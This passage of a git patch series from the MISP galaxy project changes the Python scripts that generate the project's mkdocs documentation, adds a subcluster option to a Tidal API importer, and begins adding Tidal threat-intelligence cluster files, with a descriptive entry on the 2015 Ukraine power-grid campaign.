of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs.\n\nClusters and vocabularies within MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination.\n\nAdditionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices.\n\nThe aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data.\n\nClusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms.\n\n![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png)\n\n## Publicly available clusters\n") + index.add_content( + "# MISP Galaxy\n\nThe MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs.\n\nClusters and vocabularies within MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination.\n\nAdditionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices.\n\nThe aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data.\n\nClusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms.\n\n![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png)\n\n## Publicly available clusters\n" + ) index.add_toc(universe.galaxies.values()) - index.add_content("## Statistics\n\nYou can find some statistics about MISP galaxies [here](./statistics.md).\n\n") - index.add_content("# Contributing\n\nIn the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community.\n\nWe encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request.\n") + index.add_content( + "## Statistics\n\nYou can find some statistics about MISP galaxies [here](./statistics.md).\n\n" + ) + index.add_content( + "# Contributing\n\nIn the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community.\n\nWe encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request.\n" + ) index.write_entry() statistics = StatisticsSite(SITE_PATH) - statistics.add_cluster_statistics(len([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]), len(universe.private_clusters)) + statistics.add_content("# MISP Galaxy Statistics\n\n") + statistics.add_cluster_statistics( + len( + [ + cluster + for galaxy in universe.galaxies.values() + for cluster in galaxy.clusters.values() + ] + ), + len(universe.private_clusters), + ) statistics.add_galaxy_statistics(universe.galaxies.values()) - statistics.add_relation_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) - statistics.add_synonym_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) + statistics.add_relation_statistics( + [ + cluster + for galaxy in universe.galaxies.values() + for cluster in galaxy.clusters.values() + ] + ) + statistics.add_synonym_statistics( + [ + cluster + for galaxy in universe.galaxies.values() + for cluster in galaxy.clusters.values() + ] + ) statistics.write_entry() for galaxy in universe.galaxies.values(): galaxy.write_entry(SITE_PATH) for galaxy in universe.galaxies.values(): - galaxy_path = os.path.join(SITE_PATH, f"{galaxy.json_file_name}".replace(".json", "")) + galaxy_path = os.path.join( + SITE_PATH, f"{galaxy.json_file_name}".replace(".json", "") + ) if not os.path.exists(galaxy_path): os.mkdir(galaxy_path) relation_path = os.path.join(galaxy_path, "relations") @@ -121,8 +164,9 @@ if __name__ == "__main__": with open(os.path.join(relation_path, ".pages"), "w") as index: index.write(f"hide: true\n") - with ThreadPoolExecutor(max_workers=(multiprocessing.cpu_count() * 4)) as executor: + with ThreadPoolExecutor( + max_workers=(multiprocessing.cpu_count() * 4) + ) as executor: executor.map(write_relations_table, galaxy.clusters.values()) - print(f"Finished in {time.time() - start_time} seconds") diff --git a/tools/mkdocs/modules/cluster.py b/tools/mkdocs/modules/cluster.py index 7919679..739429b 100644 --- a/tools/mkdocs/modules/cluster.py +++ b/tools/mkdocs/modules/cluster.py @@ -1,5 +1,6 @@ import validators + class Cluster: def __init__(self, uuid, galaxy, description=None, value=None, meta=None): self.uuid = uuid @@ -8,9 +9,9 @@ class Cluster: self.meta = meta self.galaxy = galaxy # Reference to the Galaxy object this cluster belongs to - self.outbound_relationships = set() - self.inbound_relationships = set() - self.relationships = set() + self.outbound_relationships = set() + self.inbound_relationships = set() + self.relationships = set() def add_outbound_relationship(self, cluster): self.outbound_relationships.add(cluster) @@ -32,7 +33,7 @@ class Cluster: if self.relationships: entry += self._create_related_entry() return entry - + def _create_title_entry(self): entry = "" entry += f"## {self.value}\n" @@ -106,4 +107,4 @@ class Cluster: entry += f'??? info "Related clusters"\n' entry += f"\n" entry += f" To see the related clusters, click [here](./relations/{self.uuid}.md).\n" - return entry \ No newline at end of file + return entry diff --git a/tools/mkdocs/modules/galaxy.py b/tools/mkdocs/modules/galaxy.py index 997ac9d..2de8ae4 100644 --- a/tools/mkdocs/modules/galaxy.py +++ b/tools/mkdocs/modules/galaxy.py @@ -2,8 +2,15 @@ from modules.cluster import Cluster from typing import List import os + class Galaxy: - def __init__(self, galaxy_name: str, json_file_name: str, authors: List[str], description: str): + def __init__( + self, + galaxy_name: str, + json_file_name: str, + authors: List[str], + description: str, + ): self.galaxy_name = galaxy_name self.json_file_name = json_file_name self.authors = authors @@ -13,7 +20,9 @@ class Galaxy: def add_cluster(self, uuid, description, value, meta): if uuid not in self.clusters: - self.clusters[uuid] = Cluster(uuid=uuid, galaxy=self, description=description, value=value, meta=meta) + self.clusters[uuid] = Cluster( + uuid=uuid, galaxy=self, description=description, value=value, meta=meta + ) def write_entry(self, path): galaxy_path = os.path.join(path, f"{self.json_file_name}".replace(".json", "")) @@ -30,7 +39,7 @@ class Galaxy: entry += self._create_authors_entry() entry += self._create_clusters_entry() return entry - + def _create_metadata_entry(self): entry = "" entry += "---\n" @@ -66,4 +75,4 @@ class Galaxy: entry = "" for cluster in self.clusters.values(): entry += cluster.generate_entry() - return entry \ No newline at end of file + return entry diff --git a/tools/mkdocs/modules/site.py b/tools/mkdocs/modules/site.py index 2938874..5306b21 100644 --- a/tools/mkdocs/modules/site.py +++ b/tools/mkdocs/modules/site.py @@ -2,6 +2,7 @@ import os from utils.helper import create_bar_chart, get_top_x, create_pie_chart + class Site: def __init__(self, path, name) -> None: self.path = path @@ -17,6 +18,7 @@ class Site: with open(os.path.join(self.path, self.name), "w") as index: index.write(self.content) + class IndexSite(Site): def __init__(self, path) -> None: super().__init__(path=path, name="index.md") @@ -27,6 +29,7 @@ class IndexSite(Site): self.add_content(f"- [{galaxy.galaxy_name}](./{galaxy_folder}/index.md)\n") self.add_content("\n") + class StatisticsSite(Site): def __init__(self, path) -> None: super().__init__(path=path, name="statistics.md") @@ -37,15 +40,28 @@ class StatisticsSite(Site): flop_20 = get_top_x(galaxy_cluster_count, 20, False) self.add_content(f"# Galaxy statistics\n") self.add_content(f"## Galaxies with the most clusters\n\n") - self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=top_20, galaxy=True)) + self.add_content( + create_bar_chart( + x_axis="Galaxy", y_axis="Count", values=top_20, galaxy=True + ) + ) self.add_content(f"## Galaxies with the least clusters\n\n") - self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=flop_20, galaxy=True)) + self.add_content( + create_bar_chart( + x_axis="Galaxy", y_axis="Count", values=flop_20, galaxy=True + ) + ) def add_cluster_statistics(self, public_clusters, private_clusters): - values = {"Public clusters": public_clusters, "Private clusters": private_clusters} + values = { + "Public clusters": public_clusters, + "Private clusters": private_clusters, + } self.add_content(f"# Cluster statistics\n") self.add_content(f"## Number of clusters\n") - self.add_content(f"Here you can find the total number of clusters including public and private clusters.The number of public clusters has been calculated based on the number of unique Clusters in the MISP galaxy JSON files. The number of private clusters could only be approximated based on the number of relations to non-existing clusters. Therefore the number of private clusters is not accurate and only an approximation.\n\n") + self.add_content( + f"Here you can find the total number of clusters including public and private clusters.The number of public clusters has been calculated based on the number of unique Clusters in the MISP galaxy JSON files. The number of private clusters could only be approximated based on the number of relations to non-existing clusters. Therefore the number of private clusters is not accurate and only an approximation.\n\n" + ) self.add_content(create_pie_chart(sector="Type", unit="Count", values=values)) def add_relation_statistics(self, clusters): @@ -62,14 +78,31 @@ class StatisticsSite(Site): top_20 = get_top_x(cluster_relations, 20) flop_20 = get_top_x(cluster_relations, 20, False) self.add_content(f"# Relation statistics\n") - self.add_content(f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n\n") + self.add_content( + f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n\n" + ) self.add_content(f"## Number of relations\n\n") - self.add_content(create_pie_chart(sector="Type", unit="Count", values={"Public relations": public_relations, "Private relations": private_relations})) - self.add_content(f"**Average number of relations per cluster**: {int(sum(cluster_relations.values()) / len(cluster_relations))}\n") + self.add_content( + create_pie_chart( + sector="Type", + unit="Count", + values={ + "Public relations": public_relations, + "Private relations": private_relations, + }, + ) + ) + self.add_content( + f"**Average number of relations per cluster**: {int(sum(cluster_relations.values()) / len(cluster_relations))}\n" + ) self.add_content(f"## Cluster with the most relations\n\n") - self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20)) + self.add_content( + create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20) + ) self.add_content(f"## Cluster with the least relations\n\n") - self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=flop_20)) + self.add_content( + create_bar_chart(x_axis="Cluster", y_axis="Count", values=flop_20) + ) def add_synonym_statistics(self, clusters): synonyms = {} @@ -79,4 +112,6 @@ class StatisticsSite(Site): top_20 = get_top_x(synonyms, 20) self.add_content(f"# Synonym statistics\n") self.add_content(f"## Cluster with the most synonyms\n\n") - self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20)) + self.add_content( + create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20) + ) diff --git a/tools/mkdocs/modules/universe.py b/tools/mkdocs/modules/universe.py index a22f48c..a470395 100644 --- a/tools/mkdocs/modules/universe.py +++ b/tools/mkdocs/modules/universe.py @@ -12,11 +12,18 @@ class Universe: def add_galaxy(self, galaxy_name, json_file_name, authors, description): if galaxy_name not in self.galaxies: - self.galaxies[galaxy_name] = Galaxy(galaxy_name=galaxy_name, json_file_name=json_file_name, authors=authors, description=description) + self.galaxies[galaxy_name] = Galaxy( + galaxy_name=galaxy_name, + json_file_name=json_file_name, + authors=authors, + description=description, + ) def add_cluster(self, galaxy_name, uuid, description, value, meta): if galaxy_name in self.galaxies: - self.galaxies[galaxy_name].add_cluster(uuid=uuid, description=description, value=value, meta=meta) + self.galaxies[galaxy_name].add_cluster( + uuid=uuid, description=description, value=value, meta=meta + ) def define_relationship(self, cluster_a_id, cluster_b_id): cluster_a = None @@ -41,17 +48,25 @@ class Universe: else: if cluster_a: # private_cluster = self.add_cluster(uuid=cluster_b_id, galaxy_name="Unknown", description=None, value="Private Cluster", meta=None) - private_cluster = Cluster(uuid=cluster_b_id, galaxy=None, description=None, value="Private Cluster", meta=None) + private_cluster = Cluster( + uuid=cluster_b_id, + galaxy=None, + description=None, + value="Private Cluster", + meta=None, + ) self.private_clusters[cluster_b_id] = private_cluster cluster_a.add_outbound_relationship(private_cluster) else: raise ValueError(f"Cluster {cluster_a} not found in any galaxy") - + def get_relationships_with_levels(self, start_cluster): def bfs_with_undirected_relationships(start_cluster): visited = set() # Tracks whether a cluster has been visited - relationships = defaultdict(lambda: float('inf')) # Tracks the lowest level for each cluster pair + relationships = defaultdict( + lambda: float("inf") + ) # Tracks the lowest level for each cluster pair queue = deque([(start_cluster, 0)]) # Queue of (cluster, level) @@ -62,22 +77,27 @@ class Universe: # Process all relationships regardless of direction if self.add_inbound_relationship: - neighbors = current_cluster.outbound_relationships.union(current_cluster.inbound_relationships) + neighbors = current_cluster.outbound_relationships.union( + current_cluster.inbound_relationships + ) else: neighbors = current_cluster.outbound_relationships for neighbor in neighbors: link = frozenset([current_cluster, neighbor]) if level + 1 < relationships[link]: relationships[link] = level + 1 - if neighbor not in visited and neighbor.value != "Private Cluster": + if ( + neighbor not in visited + and neighbor.value != "Private Cluster" + ): queue.append((neighbor, level + 1)) - + # Convert the defaultdict to a list of tuples, ignoring direction processed_relationships = [] for link, lvl in relationships.items(): # Extract clusters from the frozenset; direction is irrelevant clusters = list(link) - + # Arbitrarily choose the first cluster as 'source' for consistency if clusters[0].value == "Private Cluster": processed_relationships.append((clusters[1], clusters[0], lvl)) @@ -86,4 +106,4 @@ class Universe: return processed_relationships - return bfs_with_undirected_relationships(start_cluster) \ No newline at end of file + return bfs_with_undirected_relationships(start_cluster) diff --git a/tools/mkdocs/utils/helper.py b/tools/mkdocs/utils/helper.py index c043fe7..73c257b 100644 --- a/tools/mkdocs/utils/helper.py +++ b/tools/mkdocs/utils/helper.py @@ -1,5 +1,6 @@ import operator + def get_top_x(dict, x, big_to_small=True): sorted_dict = sorted( dict.items(), key=operator.itemgetter(1), reverse=big_to_small @@ -7,6 +8,7 @@ def get_top_x(dict, x, big_to_small=True): top_x = {key: value for key, value in sorted_dict} return top_x + def name_to_section(name): placeholder = "__TMP__" return ( @@ -18,6 +20,7 @@ def name_to_section(name): .replace(placeholder, "-") ) # Replace the placeholder with "-" + def create_bar_chart(x_axis, y_axis, values, log=False, galaxy=False): if not log: chart = f"| No. | {x_axis} | {y_axis} {{ .bar-chart }}|\n" @@ -32,6 +35,7 @@ def create_bar_chart(x_axis, y_axis, values, log=False, galaxy=False): chart += "\n" return chart + def create_pie_chart(sector, unit, values): chart = f"| No. | {sector} | {unit} {{ .pie-chart }}|\n" chart += f"|----|--------|-------|\n" @@ -40,11 +44,11 @@ def create_pie_chart(sector, unit, values): chart += "\n" return chart + def cluster_transform_to_link(cluster, uuid=False): placeholder = "__TMP__" section = ( - cluster - .value.lower() + cluster.value.lower() .replace(" - ", placeholder) # Replace " - " first .replace(" ", "-") .replace("/", "") @@ -57,10 +61,12 @@ def cluster_transform_to_link(cluster, uuid=False): else: return f"[{cluster.value}](../../{galaxy_folder}/index.md#{section})" + def galaxy_transform_to_link(galaxy): galaxy_folder = galaxy.json_file_name.replace(".json", "") return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" + def generate_relations_table(relationships): markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" markdown += "| --- | --- | --- | --- | --- |\n" @@ -71,4 +77,4 @@ def generate_relations_table(relationships): markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster, uuid=True)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" else: markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" - return markdown \ No newline at end of file + return markdown From 1a5ccd23a21774ac382bc7e60d7e0ed43bc43978 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 12:40:17 +0100 Subject: [PATCH 33/49] Add [graph] cluster description --- tools/mkdocs/generator.py | 2 +- .../site/docs/01_attachements/javascripts/graph.js | 7 ++++--- tools/mkdocs/utils/helper.py | 9 ++++++--- 3 files changed, 11 insertions(+), 7 deletions(-) diff --git a/tools/mkdocs/generator.py b/tools/mkdocs/generator.py index 34bd3cd..e3fddd3 100644 --- a/tools/mkdocs/generator.py +++ b/tools/mkdocs/generator.py @@ -24,7 +24,7 @@ def write_relations_table(cluster): if cluster.relationships: print(f"Writing {cluster.uuid}.md") with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: - index.write(generate_relations_table(cluster.relationships)) + index.write(generate_relations_table(cluster)) def get_cluster_relationships(cluster_data): diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 1e6d2ff..7b6a682 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -119,8 +119,9 @@ document$.subscribe(function () { })); let header = document.querySelector('h1').textContent; - const parentUUID = header.replace(/\s+/g, '-').charAt(0).toLowerCase() + header.replace(/\s+/g, '-').slice(1); - const Parent_Node = nodes.find(node => node.id.includes(parentUUID)); + // const parentUUID = header.replace(/\s+/g, '-').charAt(0).toLowerCase() + header.replace(/\s+/g, '-').slice(1); + // console.log("Parent UUID: " + parentUUID); + const Parent_Node = nodes.find(node => node.id.includes(header)); var links = data.map(d => ({ source: d.source, target: d.target })); @@ -140,7 +141,7 @@ document$.subscribe(function () { var simulation = d3.forceSimulation(nodes) .force("link", d3.forceLink(links).id(d => d.id).distance(linkDistance)) - .force("charge", d3.forceManyBody().strength(-50).distanceMax(500)) + .force("charge", d3.forceManyBody().strength(-70)) .force("center", d3.forceCenter(width / 2, height / 2)) .alphaDecay(0.05); // A lower value, adjust as needed diff --git a/tools/mkdocs/utils/helper.py b/tools/mkdocs/utils/helper.py index 73c257b..1d05705 100644 --- a/tools/mkdocs/utils/helper.py +++ b/tools/mkdocs/utils/helper.py @@ -67,8 +67,11 @@ def galaxy_transform_to_link(galaxy): return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" -def generate_relations_table(relationships): - markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" +def generate_relations_table(cluster): + relationships = cluster.relationships + markdown = f"# {cluster.value} \n\n" + markdown += f"{cluster.description} \n\n" + markdown += "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" markdown += "| --- | --- | --- | --- | --- |\n" for from_cluster, to_cluster, level in relationships: from_galaxy = from_cluster.galaxy @@ -76,5 +79,5 @@ def generate_relations_table(relationships): to_galaxy = to_cluster.galaxy markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster, uuid=True)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" else: - markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" + markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} ({to_cluster.uuid}) | Unknown | {level}\n" return markdown From cde860647c7266a5f3d90937efca18d8844c4e86 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 14:18:15 +0100 Subject: [PATCH 34/49] Add [tidal] sub option --- .../docs/01_attachements/javascripts/graph.js | 2 +- tools/tidal-api/main.py | 19 +- tools/tidal-api/models/cluster.py | 168 +++++++++--------- 3 files changed, 100 insertions(+), 89 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 7b6a682..48fc3c3 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -156,7 +156,7 @@ document$.subscribe(function () { // Create nodes var node = svg.append("g") - .attr("stroke", "#fff") + .attr("stroke", "#D3D3D3") .attr("stroke-width", 1.5) .selectAll("circle") .data(nodes) diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index 559a4f5..af04a0d 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -17,7 +17,7 @@ GALAXY_PATH = "../../galaxies" CLUSTER_PATH = "../../clusters" -def create_galaxy(endpoint: str, version: int, extended_relations: bool = False): +def create_galaxy(endpoint: str, version: int, extended_relations: bool = False, create_subs: bool = False): api = TidalAPI() data = api.get_data(endpoint) with open(f"{CONFIG}/{endpoint}.json", "r") as file: @@ -28,16 +28,16 @@ def create_galaxy(endpoint: str, version: int, extended_relations: bool = False) match endpoint: case "groups": - cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations) + cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations, subs=create_subs) cluster.add_values(data) case "software": - cluster = SoftwareCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations) + cluster = SoftwareCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations, subs=create_subs) cluster.add_values(data) case "campaigns": cluster = CampaignsCluster(**config["cluster"], uuid=galaxy.uuid) cluster.add_values(data) case "technique": - cluster = TechniqueCluster(**config["cluster"], uuid=galaxy.uuid) + cluster = TechniqueCluster(**config["cluster"], uuid=galaxy.uuid, subs=create_subs) cluster.add_values(data) case "tactic": cluster = TacticCluster(**config["cluster"], uuid=galaxy.uuid) @@ -56,9 +56,9 @@ def create_galaxy(endpoint: str, version: int, extended_relations: bool = False) def main(args, galaxies): if args.all: for galaxy in galaxies: - create_galaxy(galaxy, args.version, args.extended_relations) + create_galaxy(galaxy, args.version, args.extended_relations, args.create_subs) else: - create_galaxy(args.type, args.version, args.extended_relations) + create_galaxy(args.type, args.version, args.extended_relations, args.create_subs) if __name__ == "__main__": @@ -92,7 +92,12 @@ if __name__ == "__main__": parser.add_argument( "--extended-relations", action="store_true", - help="Create extended relations in the cluster", + help="Create extended relations for the clusters", + ) + parser.add_argument( + "--create-subs", + action="store_true", + help="Create subclusters from the API", ) parser.set_defaults(func=main) diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 8b355ea..7759643 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -177,9 +177,11 @@ class GroupCluster(Cluster): type: str, uuid: str, enrichment: bool = False, + subs: bool = False, ): super().__init__(authors, category, description, name, source, type, uuid) self.enrichment = enrichment + self.subs = subs def add_values(self, data): for entry in data["data"]: @@ -213,35 +215,34 @@ class GroupCluster(Cluster): "type": "similar", } ) - - for associated_group in entry.get("associated_groups"): - associated_meta = AssociatedGroupsMeta( - id=associated_group.get("id"), - owner_id=associated_group.get("owner_id"), - owner=associated_group.get("owner_name"), - ) - associated_related = [] - associated_related.append( - { - "dest-uuid": entry.get("id"), - "type": "similar", - } - ) - value = ClusterValue( - description=associated_group.get("description"), - meta=associated_meta, - related=associated_related, - uuid=associated_group.get("associated_group_id"), - value=associated_group.get("name"), - ) - self.values.append(value.return_value()) - related.append( - { - "dest-uuid": associated_group.get("associated_group_id"), - "type": "similar", - } - ) - + if self.subs: + for associated_group in entry.get("associated_groups"): + associated_meta = AssociatedGroupsMeta( + id=associated_group.get("id"), + owner_id=associated_group.get("owner_id"), + owner=associated_group.get("owner_name"), + ) + associated_related = [] + associated_related.append( + { + "dest-uuid": entry.get("id"), + "type": "similar", + } + ) + value = ClusterValue( + description=associated_group.get("description"), + meta=associated_meta, + related=associated_related, + uuid=associated_group.get("associated_group_id"), + value=associated_group.get("name"), + ) + self.values.append(value.return_value()) + related.append( + { + "dest-uuid": associated_group.get("associated_group_id"), + "type": "similar", + } + ) value = ClusterValue( description=entry.get("description"), meta=meta, @@ -263,9 +264,11 @@ class SoftwareCluster(Cluster): type: str, uuid: str, enrichment: bool = False, + subs: bool = False, ): super().__init__(authors, category, description, name, source, type, uuid) self.enrichment = enrichment + self.subs = subs def add_values(self, data): for entry in data["data"]: @@ -307,34 +310,34 @@ class SoftwareCluster(Cluster): "type": "similar", } ) - - for associated_software in entry.get("associated_software"): - associated_meta = AssociatedSoftwareMeta( - id=associated_software.get("id"), - owner_id=associated_software.get("owner_id"), - owner=associated_software.get("owner_name"), - ) - associated_related = [] - associated_related.append( - { - "dest-uuid": entry.get("id"), - "type": "similar", - } - ) - value = ClusterValue( - description=associated_software.get("description"), - meta=associated_meta, - related=associated_related, - uuid=associated_software.get("associated_software_id"), - value=associated_software.get("name"), - ) - self.values.append(value.return_value()) - related.append( - { - "dest-uuid": associated_software.get("associated_software_id"), - "type": "similar", - } - ) + if self.subs: + for associated_software in entry.get("associated_software"): + associated_meta = AssociatedSoftwareMeta( + id=associated_software.get("id"), + owner_id=associated_software.get("owner_id"), + owner=associated_software.get("owner_name"), + ) + associated_related = [] + associated_related.append( + { + "dest-uuid": entry.get("id"), + "type": "similar", + } + ) + value = ClusterValue( + description=associated_software.get("description"), + meta=associated_meta, + related=associated_related, + uuid=associated_software.get("associated_software_id"), + value=associated_software.get("name"), + ) + self.values.append(value.return_value()) + related.append( + { + "dest-uuid": associated_software.get("associated_software_id"), + "type": "similar", + } + ) value = ClusterValue( description=entry.get("description"), @@ -356,8 +359,10 @@ class TechniqueCluster(Cluster): source: str, type: str, uuid: str, + subs: bool = False, ): super().__init__(authors, category, description, name, source, type, uuid) + self.subs = subs def add_values(self, data): for entry in data["data"]: @@ -376,33 +381,34 @@ class TechniqueCluster(Cluster): } ) - for sub_technique in entry.get("sub_technique"): - sub_meta = SubTechniqueMeta( - source=sub_technique.get("source"), - technique_attack_id=sub_technique.get("technique_attack_id"), - ) - sub_related = [] - for relation in sub_technique.get("tactic"): - sub_related.append( + if self.subs: + for sub_technique in entry.get("sub_technique"): + sub_meta = SubTechniqueMeta( + source=sub_technique.get("source"), + technique_attack_id=sub_technique.get("technique_attack_id"), + ) + sub_related = [] + for relation in sub_technique.get("tactic"): + sub_related.append( + { + "dest-uuid": relation.get("tactic_id"), + "type": "uses", + } + ) + sub_value = ClusterValue( + description=sub_technique.get("description"), + meta=sub_meta, + related=sub_related, + uuid=sub_technique.get("id"), + value=sub_technique.get("name"), + ) + self.values.append(sub_value.return_value()) + related.append( { - "dest-uuid": relation.get("tactic_id"), - "type": "uses", + "dest-uuid": sub_technique.get("id"), + "type": "similar", } ) - sub_value = ClusterValue( - description=sub_technique.get("description"), - meta=sub_meta, - related=sub_related, - uuid=sub_technique.get("id"), - value=sub_technique.get("name"), - ) - self.values.append(sub_value.return_value()) - related.append( - { - "dest-uuid": sub_technique.get("id"), - "type": "similar", - } - ) value = ClusterValue( description=entry.get("description"), From 8e345c36848be3c7610bb0f5216b62cc0646af6f Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 14:27:25 +0100 Subject: [PATCH 35/49] Add [galaxies] Cyber Tidal --- clusters/tidal-campaigns.json | 664 + clusters/tidal-groups.json | 10742 ++++++ clusters/tidal-references.json | 57460 ++++++++++++++++++++++++++++ clusters/tidal-software.json | 33653 ++++++++++++++++ clusters/tidal-tactic.json | 3441 ++ clusters/tidal-technique.json | 12937 +++++++ galaxies/tidal-campaigns.json | 9 + galaxies/tidal-groups.json | 9 + galaxies/tidal-references.json | 9 + galaxies/tidal-software.json | 9 + galaxies/tidal-tactic.json | 9 + galaxies/tidal-technique.json | 9 + tools/tidal-api/main.py | 33 +- tools/tidal-api/models/cluster.py | 4 +- tools/tidal-api/models/galaxy.py | 5 +- 15 files changed, 118984 insertions(+), 9 deletions(-) create mode 100644 clusters/tidal-campaigns.json create mode 100644 clusters/tidal-groups.json create mode 100644 clusters/tidal-references.json create mode 100644 clusters/tidal-software.json create mode 100644 clusters/tidal-tactic.json create mode 100644 clusters/tidal-technique.json create mode 100644 galaxies/tidal-campaigns.json create mode 100644 galaxies/tidal-groups.json create mode 100644 galaxies/tidal-references.json create mode 100644 galaxies/tidal-software.json create mode 100644 galaxies/tidal-tactic.json create mode 100644 galaxies/tidal-technique.json diff --git a/clusters/tidal-campaigns.json b/clusters/tidal-campaigns.json new file mode 100644 index 0000000..4e14ec3 --- /dev/null +++ b/clusters/tidal-campaigns.json @@ -0,0 +1,664 @@ +{ + "authors": "Tidal", + "category": "Campaigns", + "description": "Tidal Campaigns Cluster", + "name": "Tidal Campaigns", + "source": "Tidal", + "type": "campaigns", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "values": [ + { + "description": "[2015 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/96e367d0-a744-5b63-85ec-595f505248a3) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) (specifically BlackEnergy3) and [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) to target and disrupt transmission and distribution substations within the Ukrainian power grid. This campaign was the first major public attack conducted against the Ukrainian power grid by Sandworm Team.", + "meta": { + "campaign_attack_id": "C0028", + "first_seen": "2015-12-01T05:00:00Z", + "last_seen": "2016-01-01T05:00:00Z", + "source": 